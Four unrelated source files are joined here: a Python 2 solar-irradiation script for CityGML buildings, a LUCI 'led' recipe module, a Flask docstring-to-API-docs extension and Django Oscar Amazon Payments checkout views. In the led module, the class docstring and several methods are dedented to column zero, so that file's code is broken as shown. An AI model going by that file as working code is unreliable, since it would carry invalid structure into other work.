                self.wallsurfaces.append(w)
        for wallsurface in self.wallsurfaces:
            wallarea += polygon3dmodule.getAreaOfGML(wallsurface, True)
        return wallarea - openings

    def groundarea(self):
        """The total area of GroundSurfaces."""
        self.grounds = []
        groundarea = 0.0
        for child in self.xml.getiterator():
            if child.tag == '{%s}GroundSurface' %ns_bldg:
                self.grounds.append(child)
        self.count = 0
        for groundsurface in self.grounds:
            self.count += 1
            groundarea += polygon3dmodule.getAreaOfGML(groundsurface, True)
        return groundarea

    def openingarea(self):
        """The total area of Openings.

        Side effect: records each opening polygon's gml:id in
        self.listOfOpenings so solarinfo() can skip them.
        """
        matching = []
        self.openings = []
        openingarea = 0.0
        for child in self.xml.getiterator():
            if child.tag == '{%s}opening' %ns_bldg:
                matching.append(child)
                #-- Store the list of openings
                for o in child.findall('.//{%s}Polygon' %ns_gml):
                    self.listOfOpenings.append(o.attrib['{%s}id' %ns_gml])
        for match in matching:
            for child in match.getiterator():
                if child.tag == '{%s}surfaceMember' %ns_gml:
                    self.openings.append(child)
        self.count = 0
        for openingsurface in self.openings:
            self.count += 1
            openingarea += polygon3dmodule.getAreaOfGML(openingsurface, True)
        return openingarea

    def allarea(self):
        """The total area of all surfaces."""
        self.allareas = []
        allarea = 0.0
        # for child in self.xml.getiterator():
        #     if child.tag == '{%s}surfaceMember' %ns_gml:
        #         self.allareas.append(child)
        self.allareas = self.xml.findall('.//{%s}Polygon' %ns_gml)
        self.count = 0
        for poly in self.allareas:
            self.count += 1
            allarea += polygon3dmodule.getAreaOfGML(poly, True)
        return allarea
def oparea(xmlelement):
    """The total area of Openings in the XML tree."""
    opening_tag = '{%s}opening' % ns_bldg
    member_tag = '{%s}surfaceMember' % ns_gml
    total = 0.0
    # Walk every <opening> and sum the area of its surface members.
    for node in xmlelement.getiterator():
        if node.tag == opening_tag:
            for member in node.getiterator():
                if member.tag == member_tag:
                    total += polygon3dmodule.getAreaOfGML(member, True)
    return total
# Main driver: parse every CityGML file in DIRECTORY, estimate per-roof
# irradiation, and write enriched copies into RESULT.
# NOTE: this file is Python 2 (print statements without parentheses).
print "I am Solar3Dcity. Let me search for your CityGML files..."
#-- Find all CityGML files in the directory
os.chdir(DIRECTORY)
for f in glob.glob("*.gml"):
    FILENAME = f[:f.rfind('.')]
    # NOTE(review): plain concatenation -- assumes DIRECTORY ends with a
    # path separator; confirm or the parse below fails.
    FULLPATH = DIRECTORY + f
    CITYGML = etree.parse(FULLPATH)
    root = CITYGML.getroot()
    cityObjects = []
    buildings = []
    # Module-level collectors consumed by Building.solarinfo(); reset per file.
    listofxmlroofsurfaces = []
    roofsurfacedata = {}
    #-- Find all instances of cityObjectMember and put them in a list
    for obj in root.getiterator('{%s}cityObjectMember'% ns_citygml):
        cityObjects.append(obj)
    print FILENAME
    print "\tThere are", len(cityObjects), "cityObject(s) in this CityGML file"
    for cityObject in cityObjects:
        for child in cityObject.getchildren():
            if child.tag == '{%s}Building' %ns_bldg:
                buildings.append(child)
    #-- Store the buildings as classes (the Building constructor already
    #-- performs the whole per-building solar computation)
    buildingclasses = []
    for b in buildings:
        id = b.attrib['{%s}id' %ns_gml]
        buildingclasses.append(Building(b, id))
    print "\tI have read all buildings, now I will search for roofs and estimate their solar irradiation..."
    #-- Store the obtained data in a dictionary
    solardata = {}
    #-- Check if there are roof surfaces in the file
    rsc = 0
    #-- Iterate all buildings
    for bu in buildingclasses:
        # NOTE(review): roofarea() re-walks the XML here even though
        # bu.RoofSurfaceArea already holds the same value -- confirm.
        solardata[bu.id] = {'roofarea' : bu.roofarea(), 'totalIrradiation' : bu.sumIrr}
        rsc += bu.RoofSurfaceArea
    if rsc > 0:
        print '\tEnriching CityGML file with the solar irradiation data...'
        # Attach per-roof-surface results as child elements.
        for rsxml in listofxmlroofsurfaces:
            rsid = rsxml.attrib['{%s}id' %ns_gml]
            s = etree.SubElement(rsxml, "area")
            s.text = str(roofsurfacedata[rsid]['area'])
            s.attrib['unit'] = 'm^2'
            i = etree.SubElement(rsxml, "totalIrradiation")
            i.text = str(roofsurfacedata[rsid]['total_irradiation'])
            i.attrib['unit'] = 'kWh'
            a = etree.SubElement(rsxml, "azimuth")
            a.text = str(roofsurfacedata[rsid]['azimuth'])
            a.attrib['unit'] = 'degree'
            t = etree.SubElement(rsxml, "tilt")
            t.text = str(roofsurfacedata[rsid]['tilt'])
            t.attrib['unit'] = 'degree'
            ni = etree.SubElement(rsxml, "irradiation")
            ni.text = str(roofsurfacedata[rsid]['irradiation'])
            ni.attrib['unit'] = 'kWh/m^2'
        # Attach per-building totals.
        for b in buildings:
            bid = b.attrib['{%s}id' %ns_gml]
            s = etree.SubElement(b, "roofArea")
            s.text = str(solardata[bid]['roofarea'])
            s.attrib['unit'] = 'm^2'
            i = etree.SubElement(b, "yearlyIrradiation")
            i.text = str(solardata[bid]['totalIrradiation'])
            i.attrib['unit'] = 'kWh'
        os.chdir(RESULT)
        # NOTE(review): same separator assumption for RESULT as above.
        with open(RESULT + FILENAME + '-solar.gml', 'w') as f:
            f.write(etree.tostring(root))
        print "\tFile written."
    else:
        print "\tI am afraid I did not find any RoofSurface in your CityGML file."
print "All done."
| |
# Copyright 2018 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""An interface to call the led tool."""
from builtins import range
from future.moves.urllib.parse import urlparse
from future.utils import iteritems
import hashlib
import attr
from recipe_engine import recipe_api
from recipe_engine import recipe_test_api
from PB.go.chromium.org.luci.led.job import job
class LedApi(recipe_api.RecipeApi):
"""Interface to the led tool.
"led" stands for LUCI editor. It allows users to debug and modify LUCI jobs.
It can be used to modify many aspects of a LUCI build, most commonly
including the recipes used.
The main interface this module provides is a direct call to the led binary:
led_result = api.led(
'get-builder', ['luci.chromium.try:chromium_presubmit'])
final_data = led_result.then('edit-recipe-bundle').result
See the led binary for full documentation of commands.
"""
  @attr.s(frozen=True, slots=True)
  class LedLaunchData(object):
    # Immutable record describing the swarming task created by `led launch`.
    swarming_hostname = attr.ib()
    task_id = attr.ib()

    @property
    def swarming_task_url(self):
      """The fully-qualified URL of the launched swarming task."""
      return 'https://%s/task?id=%s' % (self.swarming_hostname, self.task_id)
  class LedResult(object):
    """Holds the result of a led operation. Can be chained using |then|."""

    def __init__(self, result, module):
      # NOTE(review): when `result` is a LedLaunchData (i.e. the previous
      # call was `led launch`), `_result` is also set to that object even
      # though the `result` property's docstring promises None -- confirm.
      if isinstance(result, LedApi.LedLaunchData):
        self._launch_result = result
        self._result = result
        self._module = None
      else:
        self._launch_result = None
        self._result = result
        self._module = module

    @property
    def result(self):
      """The mutable job.Definition proto message from the previous led call.

      If the previous led call was `launch`, then this will be None, and
      launch_result will be populated.
      """
      return self._result

    @property
    def launch_result(self):
      """A LedLaunchData object. Only set when the previous led call was
      'led launch'."""
      return self._launch_result

    @property
    def edit_rbh_value(self):
      """Returns either the user_payload or cas_user_payload value suitable to
      pass to `led edit -rbh`.

      Returns `None` if this information is not set.
      """
      r = self._result
      if r:
        # Falls through to an implicit None when the digest hash is unset.
        if r.cas_user_payload.digest.hash:
          return "%s/%d" % (r.cas_user_payload.digest.hash,
                            r.cas_user_payload.digest.size_bytes)

    def then(self, *cmd):
      """Invoke led, passing it the current `result` data as input.

      Returns another LedResult object with the output of the command.
      """
      # Launch results are terminal: there is no job.Definition to feed
      # into a follow-up led command.
      if self._module is None:  # pragma: no cover
        raise ValueError(
            'Cannot call LedResult.then on the result of `led launch`')
      return self.__class__(
          self._module._run_command(self._result, *cmd), self._module)
  def __init__(self, props, **kwargs):
    """Captures the module properties injected by the recipe engine.

    Args:
      * props: the module's InputProperties message, carrying led_run_id
        plus optionally one of rbe_cas_input / cipd_input.
    """
    super(LedApi, self).__init__(**kwargs)
    # Non-empty only when the current build was itself launched by led.
    self._run_id = props.led_run_id
    # HasField distinguishes "unset" from a present-but-empty message.
    if props.HasField('rbe_cas_input'):
      self._rbe_cas_input = props.rbe_cas_input
    else:
      self._rbe_cas_input = None
    if props.HasField('cipd_input'):
      self._cipd_input = props.cipd_input
    else:
      self._cipd_input = None
def initialize(self):
if self._test_data.enabled:
self._get_mocks = {
key[len('get:'):]: value
for key, value in iteritems(self._test_data)
if key.startswith('get:')
}
self._mock_edits = self.test_api.standard_mock_functions()
sorted_edits = sorted([
(int(key[len('edit:'):]), value)
for key, value in iteritems(self._test_data)
if key.startswith('edit:')
])
self._mock_edits.extend(value for _, value in sorted_edits)
  @property
  def launched_by_led(self):
    """Whether the current build is a led job."""
    # Non-empty `led_run_id` input property marks a led-launched build.
    return bool(self._run_id)
  @property
  def run_id(self):
    """A unique string identifier for this led job.

    If the current build is *not* a led job, value will be an empty string.
    """
    # Taken verbatim from the `led_run_id` input property.
    return self._run_id
  @property
  def rbe_cas_input(self):
    """The location of the rbe-cas containing the recipes code being run.

    If set, it will be a `swarming.v1.CASReference` protobuf;
    otherwise, None.
    """
    # None unless the 'rbe_cas_input' input property was explicitly set.
    return self._rbe_cas_input
  @property
  def cipd_input(self):
    """The versioned CIPD package containing the recipes code being run.

    If set, it will be an `InputProperties.CIPDInput` protobuf; otherwise None.
    """
    # None unless the 'cipd_input' input property was explicitly set.
    return self._cipd_input
def __call__(self, *cmd):
"""Runs led with the given arguments. Wraps result in a `LedResult`."""
return self.LedResult(self._run_command(None, *cmd), self)
def inject_input_recipes(self, led_result):
"""Sets the version of recipes used by led to correspond to the version
currently being used.
If neither the `rbe_cas_input` nor the `cipd_input` property is set,
this is a no-op.
Args:
* led_result: The `LedResult` whose job.Definition will be passed into the
edit command.
"""
if self.rbe_cas_input:
return led_result.then(
'edit',
'-rbh',
'%s/%s' % (
self.rbe_cas_input.digest.hash, self.rbe_cas_input.digest.size_bytes))
if self.cipd_input:
return led_result.then(
'edit',
'-rpkg', self.cipd_input.package,
'-rver', self.cipd_input.version)
# TODO(iannucci): Check for/inject buildbucket exe package/version
return led_result
  def _get_mock(self, cmd):
    """Returns a StepTestData for the given command.

    Looks up a user-supplied mock job.Definition for the `get-builder`,
    `get-build` and `get-swarm` commands; any other command yields a
    StepTestData with retcode 1 (a failing led invocation).
    """
    job_def = None
    def _pick_mock(prefix, specific_key):
      # We do multiple lookups potentially, depending on what level of
      # specificity the user has mocked with.
      toks = specific_key.split('/')
      for num_toks in range(len(toks), -1, -1):
        key = '/'.join([prefix] + toks[:num_toks])
        if key in self._get_mocks:
          return self._get_mocks[key]
      return job.Definition()
    if cmd[0] == 'get-builder':
      # Accept both the legacy "luci.<project>.<bucket>" and the
      # "<project>/<bucket>" bucket formats.
      bucket, builder = cmd[-1].split(':', 1)
      if bucket.startswith('luci.'):
        project, bucket = bucket[len('luci.'):].split('.', 1)
      else:
        project, bucket = bucket.split('/', 1)
      mocked = _pick_mock(
          'buildbucket/builder',
          '%s/%s/%s' % (project, bucket, builder))
      # `mocked` can only be None if a mock value was explicitly set to
      # None; otherwise _pick_mock falls back to an empty job.Definition.
      if mocked is not None:
        job_def = job.Definition()
        job_def.CopyFrom(mocked)
        job_def.buildbucket.bbagent_args.build.builder.project = project
        job_def.buildbucket.bbagent_args.build.builder.bucket = bucket
        job_def.buildbucket.bbagent_args.build.builder.builder = builder
    elif cmd[0] == 'get-build':
      # Build ids may be passed in "b<id>" form; strip the prefix.
      build_id = str(cmd[-1]).lstrip('b')
      mocked = _pick_mock('buildbucket/build', build_id)
      if mocked is not None:
        job_def = job.Definition()
        job_def.CopyFrom(mocked)
        job_def.buildbucket.bbagent_args.build.id = int(build_id)
    elif cmd[0] == 'get-swarm':
      task_id = cmd[-1]
      mocked = _pick_mock('swarming/task', task_id)
      if mocked is not None:
        job_def = job.Definition()
        job_def.CopyFrom(mocked)
        job_def.swarming.task.task_id = task_id
    if job_def is not None:
      return self.test_api.m.proto.output_stream(job_def)
    # Unrecognized command (or a mock explicitly set to None): simulate a
    # failing led invocation.
    ret = recipe_test_api.StepTestData()
    ret.retcode = 1
    return ret
  def _run_command(self, previous, *cmd):
    """Runs led with a given command and arguments.

    Args:
      * cmd: The led command to run, e.g. 'get-builder', 'edit', along with
        any arguments.
      * previous: The previous led step's json result, if any. This can be
        used to chain led commands together. See the tests for an example of
        this.

    Ensures that led is checked out on disk before trying to execute the
    command.

    Returns either a job.Definition or a LedLaunchData.
    """
    is_launch = cmd[0] == 'launch'
    if is_launch:
      # `led launch` emits a small JSON blob describing the launched
      # swarming task rather than a job.Definition.
      kwargs = {
          'stdout': self.m.json.output(),
      }
      if self._test_data.enabled:
        # To allow easier test mocking with e.g. the swarming.collect step, we
        # take the task_id as build.infra.swarming.task_id, if it's set, and
        # otherwise use a fixed string.
        #
        # We considered hashing the payload to derived the task id, but some
        # recipes re-launch the same led task multiple times. In that case they
        # usually need to manually provide the task id anyway.
        task_id = previous.buildbucket.bbagent_args.build.infra.swarming.task_id
        if not task_id:
          task_id = 'fake-task-id'
        kwargs['step_test_data'] = lambda: self.test_api.m.json.output_stream({
            'swarming': {
                'host_name': urlparse(self.m.swarming.current_server).netloc,
                'task_id': task_id,
            }
        })
    else:
      # All other led commands read and write job.Definition as JSONPB.
      kwargs = {
          'stdout': self.m.proto.output(job.Definition, 'JSONPB'),
      }
      if self._test_data.enabled:
        if cmd[0].startswith('get-'):
          kwargs['step_test_data'] = lambda: self._get_mock(cmd)
        else:
          # We run this outside of the step_test_data callback to make the stack
          # trace a bit more obvious.
          build = self.test_api._transform_build(
              previous, cmd, self._mock_edits,
              str(self.m.context.cwd or self.m.path['start_dir']))
          kwargs['step_test_data'] = (
              lambda: self.test_api.m.proto.output_stream(build))
    if previous is not None:
      # Chained invocation: feed the previous job.Definition to led's stdin.
      kwargs['stdin'] = self.m.proto.input(previous, 'JSONPB')
    result = self.m.step(
        'led %s' % cmd[0], ['led'] + list(cmd), **kwargs)
    if is_launch:
      # If we launched a task, add a link to the swarming task.
      retval = self.LedLaunchData(
          swarming_hostname=result.stdout['swarming']['host_name'],
          task_id=result.stdout['swarming']['task_id'])
      result.presentation.links['Swarming task'] = retval.swarming_task_url
    else:
      retval = result.stdout
    return retval
| |
from flask import current_app, render_template, render_template_string
import sys
import re
from flask import current_app, render_template, render_template_string
from jinja2 import evalcontextfilter
import flaskredoc.frontend
import flaskredoc.api
from flaskredoc.frontend.views import toc
from flaskredoc import helpStruct, helpPoints, helpGroups
from inspect import getfile
from docutils.core import publish_doctree
import os
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
class ReDoc(object):
    """Flask extension that builds REST API documentation from the docstrings
    (and optional ``.rsp`` response files) of an application's view functions,
    recording the results in the module-level helpStruct/helpPoints/helpGroups
    structures."""

    def __init__(self, app=None, dmware=None, respfolder=None):
        """
        :param app: The flask application
        :param dmware: Place Holder for Werkuzug dispatcher middleware
        :param respfolder: Currently unused; reserved for a custom response
            folder.
        :raises KeyError: if ``app`` is None.
        :todo : Add dispatcher middleware support.
        :todo : Add support for specifying a response folder
        """
        if app is None:
            raise KeyError("app cannot be None")
        self.app = app
        self.init_app(app=app)
        self.resp_folder = None

    def init_app(self, app=None):
        """
        Initializes the flask extension providing teardown
        steps.
        :param app: Pass in the flask application object.
        """
        # Flask >= 0.9 exposes teardown_appcontext; fall back to
        # teardown_request on older versions.
        if hasattr(app, 'teardown_appcontext'):
            app.teardown_appcontext(self.teardown)
        else:
            app.teardown_request(self.teardown)

    def teardown(self, exception):
        """Teardown hook. The extension holds no per-context resources, so
        this only inspects the context stack."""
        ctx = stack.top

    def doc_app(self):
        """Walks every URL rule of the app (except 'static') and records its
        documentation in helpStruct, helpPoints and helpGroups."""
        ignr_lst = ['static']
        for rl in self.app.url_map.iter_rules():
            if rl.endpoint in ignr_lst:
                continue
            epnt = str(rl)
            fname = self.app.view_functions[rl.endpoint].__name__
            h = self.proc_docstr(func=self.app.view_functions[rl.endpoint])
            h.update({'name': epnt,
                      "functionName": fname
                      })
            if self.resp_folder is None:
                # Look for a "<module>.rsp" file next to the view's module.
                rsp_file = "%s.rsp" % getfile(self.app.view_functions[rl.endpoint]).split('.')[0]
                if os.path.isfile(rsp_file):
                    resps = self.read_responses(func=fname, route=epnt, rsp_file=rsp_file)
                    if resps is not False:
                        h.update({'responses': resps})
            helpPoints.append({
                "name": epnt,
                "functionName": fname,
                "parent": "/" + "/".join(h['name'].lstrip('/').split('/')[0:-1]),
                "summary": h['summary']
            })
            # parse_params() deletes empty keys, so 'GROUP' may be absent --
            # use .get() instead of indexing (indexing raised KeyError for
            # endpoints without any @GROUP tag).
            if h.get('GROUP'):
                for g in h['GROUP']:
                    obj = [hg for hg in helpGroups if hg['groupName'] == g]
                    if len(obj) >= 1:
                        group = obj.pop()
                        group['endPoints'].append(epnt)
                    else:
                        helpGroups.append({"groupName": g,
                                           "endPoints": [epnt]
                                           })
            helpStruct.append(h)

    def read_responses(self, func=None, route=None, rsp_file=None):
        """Parses a reST ``.rsp`` file and returns the response entries of
        the section whose name matches ``func`` or ``route``.

        :param func: Name of the view function.
        :param route: URL rule string of the view.
        :param rsp_file: Path to the ``.rsp`` file to parse.
        :returns: A list of dicts with ``name``/``response`` plus any parsed
            field values; empty when no section matches.
        """
        # Joins the text of a node's direct text children.
        get_ctext = lambda z: " ".join([c.nodeValue for c in z.childNodes if c.nodeType == c.TEXT_NODE])
        with open(rsp_file, 'r') as r:
            rsp = r.read()
        resps = []
        for sec in publish_doctree(rsp).asdom().getElementsByTagName('section'):
            if sec.getAttribute('names') == func or sec.getAttribute('names') == route:
                t = {}
                for cnode in sec.getElementsByTagName('section')[0].childNodes:
                    if cnode.nodeName == 'field_list':
                        fields = {}
                        for f in cnode.getElementsByTagName('field'):
                            name = None
                            for fc in f.childNodes:
                                if fc.nodeName == 'field_name':
                                    name = get_ctext(fc)
                                if fc.nodeName == 'field_body' and name:
                                    for p in fc.getElementsByTagName('paragraph'):
                                        fields.update({name: get_ctext(p)})
                        t.update(fields)
                    elif cnode.nodeName == 'title':
                        t.update({'name': get_ctext(cnode)})
                    elif cnode.nodeName == 'literal_block':
                        t.update({'response': get_ctext(cnode)})
                resps.append(t)
        return resps

    def proc_docstr(self, func=None):
        """Parses a view function's docstring into a help dict with
        ``summary``, ``about`` and any parameter sections.

        :param func: The view function whose ``__doc__`` is processed.
        """
        summary, doc = self.trim(func.__doc__)
        hmsg, params = self.find_lines(doc)
        hlp = {
            "about": doc.split('\n')[
                hmsg['hstart']] if hmsg['hstart'] == hmsg['hend'] else '\n'.join(
                doc.split('\n')[
                    hmsg['hstart']:hmsg['hend']]),
            "summary": doc.split('\n')[0]}
        hlp.update(self.parse_params(params=params, doc=doc))
        return hlp

    def trim(self, docstring):
        """Dedents a docstring (PEP 257 algorithm) and splits it in two.

        :param docstring: The raw docstring; may be None or empty.
        :returns: ``[first_line, rest]`` where ``rest`` is the remaining
            non-blank lines joined with newlines. For an empty docstring both
            elements are empty strings. (Previously the bare string ``''``
            was returned, which crashed callers unpacking two values.)
        """
        if not docstring:
            return ['', '']
        # Convert tabs to spaces (following the normal Python rules)
        # and split into a list of lines:
        lines = docstring.expandtabs().splitlines()
        # Determine minimum indentation (first line doesn't count):
        indent = sys.maxsize
        for line in lines[1:]:
            stripped = line.lstrip()
            if stripped:
                indent = min(indent, len(line) - len(stripped))
        # Remove indentation (first line is special):
        trimmed = [lines[0].strip()]
        if indent < sys.maxsize:
            for line in lines[1:]:
                trimmed.append(line[indent:].rstrip())
        # Strip off trailing and leading blank lines:
        while trimmed and not trimmed[-1]:
            trimmed.pop()
        while trimmed and not trimmed[0]:
            trimmed.pop(0)
        # Return the first line plus the joined non-blank remainder:
        return [
            trimmed.pop(0),
            '\n'.join(
                filter(
                    lambda y: True if len(
                        y.strip()) > 0 else False,
                    trimmed))]

    def find_lines(self, doc):
        """Scans a trimmed docstring, locating the free-text help block and
        the ``*``-prefixed parameter lines.

        :param doc: The trimmed docstring body.
        :returns: ``({'hstart': ..., 'hend': ...}, params)`` where params is
            a list of line indexes; an ``[i, i + 1]`` pair is recorded when
            a parameter's value continues on the following line.
        """
        hstart = 0
        hend = 0
        lines = doc.split('\n')
        params = []
        for i in xrange(len(lines)):
            if not re.match(r'^\*', lines[i]):
                # Non-parameter line: part of the free-text help message.
                if hstart == 0:
                    hstart = i
            else:
                if hend == 0:
                    hend = i - 1
                # An indented '*' on the next line is a continuation of this
                # parameter (e.g. its list of valid values).
                if i != (len(lines) - 1) and re.match(r'\s+\*', lines[i + 1]):
                    params.append([i, i + 1])
                else:
                    params.append(i)
        return ({"hstart": 0 if hstart == 0 else (hstart - 1),
                 "hend": 0 if hend == 0 else (hend - 1)},
                params)

    def parse_params(self, params=None, doc=None):
        """Parses the ``*``-tagged docstring lines into a dict keyed by tag
        (GET/POST/URL/CODE/GROUP); keys with no entries are removed.

        :param params: Line indexes produced by :meth:`find_lines`.
        :param doc: The trimmed docstring body.
        """
        lns = doc.split('\n')
        rsp = {
            "GET": [],
            "POST": [],
            "URL": [],
            "CODE": [],
            "GROUP": []
        }
        # First line of a parameter: "*@TAG name: message".
        gfln = lambda x: lns[x].lstrip('*').lstrip().split(':')
        # Continuation line: strip the leading indent plus '*'.
        gsln = lambda z: re.sub(r'\s+\*', '', lns[z]).split(':')
        # Split the header on spaces and drop the '@' markers.
        fhd = lambda y: map(lambda x: x.replace('@', ''), y.split(' '))
        urls = []
        for p in params:
            if type(p).__name__ == 'int':
                hd, msg = gfln(p)
                hd = fhd(hd)
                vd = None
            elif type(p).__name__ == 'list':
                hd, msg = gfln(p[0])
                hd = fhd(hd)
                vd = gsln(p[1])
            if len(hd) == 1 and hd[0] == 'GROUP':
                rsp['GROUP'] = rsp['GROUP'] + msg.strip().split(',')
            elif len(hd) == 2:
                if hd[0] not in rsp:
                    continue
                if vd:
                    rsp[hd[0]].append({'name': hd[1],
                                       'message': msg.strip(),
                                       'valid': vd[1]
                                       })
                else:
                    rsp[hd[0]].append({'name': hd[1],
                                       'message': msg.strip()})
            elif len(hd) == 3:
                urls.append([hd, msg])
        if len(urls) > 0:
            # Python 2 comparator sort: orders URL entries by numeric order
            # tag (see cmp_items).
            urls.sort(self.cmp_items)
            [rsp['URL'].append(
                {"name": url[0][2], "message": url[1], "order": url[0][1]}) for url in urls]
        # Snapshot the keys: we delete entries while looping.
        for k in list(rsp.keys()):
            if len(rsp[k]) < 1:
                del(rsp[k])
        return rsp

    def cmp_items(self, a, b):
        """Python 2 style comparator ordering ``[header, message]`` URL
        entries by the numeric order field ``header[1]``."""
        if int(a[0][1]) > int(b[0][1]):
            return 1
        elif int(a[0][1]) == int(b[0][1]):
            return 0
        else:
            return -1

    def create_frontend(self):
        """Returns the bundled documentation-browser flask application."""
        return flaskredoc.frontend.app

    def create_help_api(self):
        """Returns the bundled help API flask application."""
        return flaskredoc.api.api
| |
import logging
import simplejson
from django.core.urlresolvers import reverse, reverse_lazy
from django.contrib import messages
from django.conf import settings
from django.utils.translation import ugettext as _
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
from django.views import generic
from django import http
from django.http import HttpResponse, HttpResponseNotFound, HttpResponseForbidden
from oscar.core.loading import get_class, get_model
from oscar.apps.checkout import utils as checkout_utils
from oscar.apps.checkout.views import (
PaymentDetailsView, ShippingMethodView, PaymentMethodView, IndexView)
from models import AmazonPaymentsSession
from api import AmazonPaymentsAPI, AmazonPaymentsAPIError
logger = logging.getLogger("amazon_payments")
# Resolve Oscar models and classes through the loader so that project-level
# overrides of the core apps are honoured.
Country = get_model('address', 'country')
ShippingAddress = get_model('order', 'ShippingAddress')
Source = get_model('payment', 'Source')
SourceType = get_model('payment', 'SourceType')
Repository = get_class('shipping.repository', 'Repository')
UnableToTakePayment = get_class('payment.exceptions', 'UnableToTakePayment')
PaymentError = get_class('payment.exceptions', 'PaymentError')
CheckoutSessionMixin = get_class('checkout.session', 'CheckoutSessionMixin')
FailedPreCondition = get_class('checkout.exceptions', 'FailedPreCondition')
NoShippingRequired = get_class('shipping.methods', 'NoShippingRequired')
from brit_python.checkout.views import CheckoutView
import oscar
# True when the installed Oscar is not the 0.6 series this integration was
# written against.
oscar_version_changed = oscar.VERSION[0:2] != (0, 6)
class ShippingMethodMixin(object):
    """Helpers for resolving the shipping method stored in the checkout
    session, falling back to the repository default."""

    def get_current_shipping_method(self, basket):
        """Returns the session-selected shipping method for this basket, or
        the default method when none is stored/resolvable."""
        session_data = checkout_utils.CheckoutSessionData(self.request)
        code = session_data._get('shipping', 'method_code')
        method = Repository().find_by_code(code, basket)
        return method or self.get_default_shipping_method(basket)

    def get_default_shipping_method(self, basket):
        """Returns the repository's default shipping method for the current
        request/user/basket."""
        repo = Repository()
        return repo.get_default_shipping_method(
            request=self.request,
            user=self.request.user,
            basket=basket,
        )
class AmazonLoginRedirectView(generic.RedirectView):
    """
    Redirects to the next step after a user clicks on the
    'Pay with Amazon' button.
    """
    permanent = False
    # Next checkout step; subclasses override this to change the flow.
    _redirect_url = reverse_lazy('checkout:amazon-payments-index')

    def get_redirect_url(self, **kwargs):
        """
        Gets the billing agreement ID and access token created when the
        user clicks on the 'Pay with Amazon' button and saves them to the DB,
        then redirects to the URL in self._redirect_url.
        """
        billing_agreement_id = self.request.GET.get('billing_agreement_id')
        access_token = self.request.GET.get('access_token')
        if billing_agreement_id:
            # Reuse the basket's existing Amazon session when there is one;
            # otherwise start a fresh one for this basket.
            try:
                session = self.request.basket.amazonpaymentssession
            except AmazonPaymentsSession.DoesNotExist:
                session = AmazonPaymentsSession(basket=self.request.basket)
            session.billing_agreement_id = billing_agreement_id
            session.access_token = access_token
            session.save()
        else:
            # Amazon did not hand back a billing agreement: treat as a failed
            # login and send the user back to their basket.
            messages.error(self.request,
                           _("An error occurred during login. Please try again"
                             " later."))
            return reverse('basket:summary')
        return self._redirect_url
class AmazonCheckoutView(object):
    """Mixin providing the shared Amazon Payments plumbing (API client,
    session lookup, widget context variables and checkout pre-conditions)
    for the Amazon checkout views."""

    def init_amazon_payments(self):
        """
        Creates a `session` and `api` variables to be used for interacting
        with the Amazon Payments API. Returns True if successful, else
        returns False
        """
        try:
            self.session = self.request.basket.amazonpaymentssession
        except (AmazonPaymentsSession.DoesNotExist, AttributeError):
            # No Amazon session exists for this basket (or there is no
            # basket attribute at all) -- the caller should bounce the user.
            return False
        logger.debug("Amazon Billing Agreement ID: %s" % (
            self.session.billing_agreement_id))
        self.api = AmazonPaymentsAPI(
            settings.AMAZON_PAYMENTS_ACCESS_KEY,
            settings.AMAZON_PAYMENTS_SECRET_KEY,
            settings.AMAZON_PAYMENTS_SELLER_ID,
            settings.AMAZON_PAYMENTS_API_ENDPOINT,
            settings.AMAZON_PAYMENTS_API_VERSION,
            settings.AMAZON_PAYMENTS_IS_LIVE,
        )
        return True

    def save_to_db_callback(self, raw_request, raw_response):
        # Persist every raw API request/response pair against the Amazon
        # session for audit/debugging purposes.
        return self.session.transactions.create(
            request=raw_request, response=raw_response)

    def get_amazon_payments_context_vars(self):
        """
        Returns a dict with all the Amazon Payments data that would
        be needed in a template in order to display widgets.
        """
        return {
            'amazon_payments_seller_id': settings.AMAZON_PAYMENTS_SELLER_ID,
            'amazon_payments_client_id': settings.AMAZON_PAYMENTS_CLIENT_ID,
            'amazon_payments_is_live': settings.AMAZON_PAYMENTS_IS_LIVE,
            'amazon_payments_billing_agreement_id': (
                self.session.billing_agreement_id),
        }

    def get_amazon_order_details(self, request, **kwargs):
        """
        Performs a GetBillingAgreementDetails request, and checks whether
        the user has set a valid shipping address (if
        validate_shipping_address is True) and/or there is a valid
        payment method (if validate_payment_details is True).

        Returns the API result on success; on failure, queues each error as
        a user-visible message and returns None.
        """
        if kwargs.get("validate_shipping_address", True):
            kwargs["valid_shipping_countries"] = Country.objects\
                .filter(is_shipping_country=True)\
                .values_list("iso_3166_1_a2", flat=True)
        kwargs["callback"] = self.save_to_db_callback
        success, result = self.api.get_amazon_order_details(
            self.session.billing_agreement_id, self.session.access_token,
            getattr(request.basket, "has_subscriptions", False), **kwargs)
        if success:
            return result
        # On failure `result` holds a list of error strings.
        for error in result:
            messages.error(request, _(error))

    def check_user_email_is_captured(self, request):
        """
        Overrides Oscar's pre-condition to change URL to redirect
        to if condition not satisfied.
        """
        if not request.user.is_authenticated() \
                and not self.checkout_session.get_guest_email():
            raise FailedPreCondition(
                url=reverse('checkout:amazon-payments-index'),
                message=_(
                    "Please either sign in or enter your email address")
            )

    def check_basket_requires_shipping(self, request):
        """
        Overrides Oscar's pre-condition to change URL to redirect
        to if condition not satisfied.
        """
        # Check to see that a shipping address is actually required. It may
        # not be if the basket is purely downloads
        if not request.basket.is_shipping_required():
            raise FailedPreCondition(
                url=reverse('checkout:amazon-payments-shipping-method'),
                message=_(
                    "Your basket does not require a shipping"
                    "address to be submitted")
            )

    def check_shipping_data_is_captured(self, request):
        """
        Overrides Oscar's pre-condition to change URL to redirect
        to if condition not satisfied.
        """
        if not request.basket.is_shipping_required():
            return
        # Check that shipping address has been completed
        if not self.checkout_session.is_shipping_address_set():
            raise FailedPreCondition(
                url=reverse('checkout:amazon-payments-shipping-address'),
                message=_("Please choose a shipping address")
            )
        # Check that shipping method has been set
        if not self.checkout_session.is_shipping_method_set(
                request.basket):
            raise FailedPreCondition(
                url=reverse('checkout:amazon-payments-shipping-method'),
                message=_("Please choose a shipping method")
            )
class AmazonPaymentsIndexView(IndexView):
    """First step of the Amazon checkout: Oscar's normal index step, but it
    continues to the Amazon shipping-address view on success."""
    success_url = reverse_lazy('checkout:amazon-payments-shipping-address')
class AmazonShippingAddressView(AmazonCheckoutView, CheckoutSessionMixin,
                                generic.TemplateView):
    """Shipping-address step: the address is chosen inside Amazon's
    AddressBook widget and read back from the API on POST."""
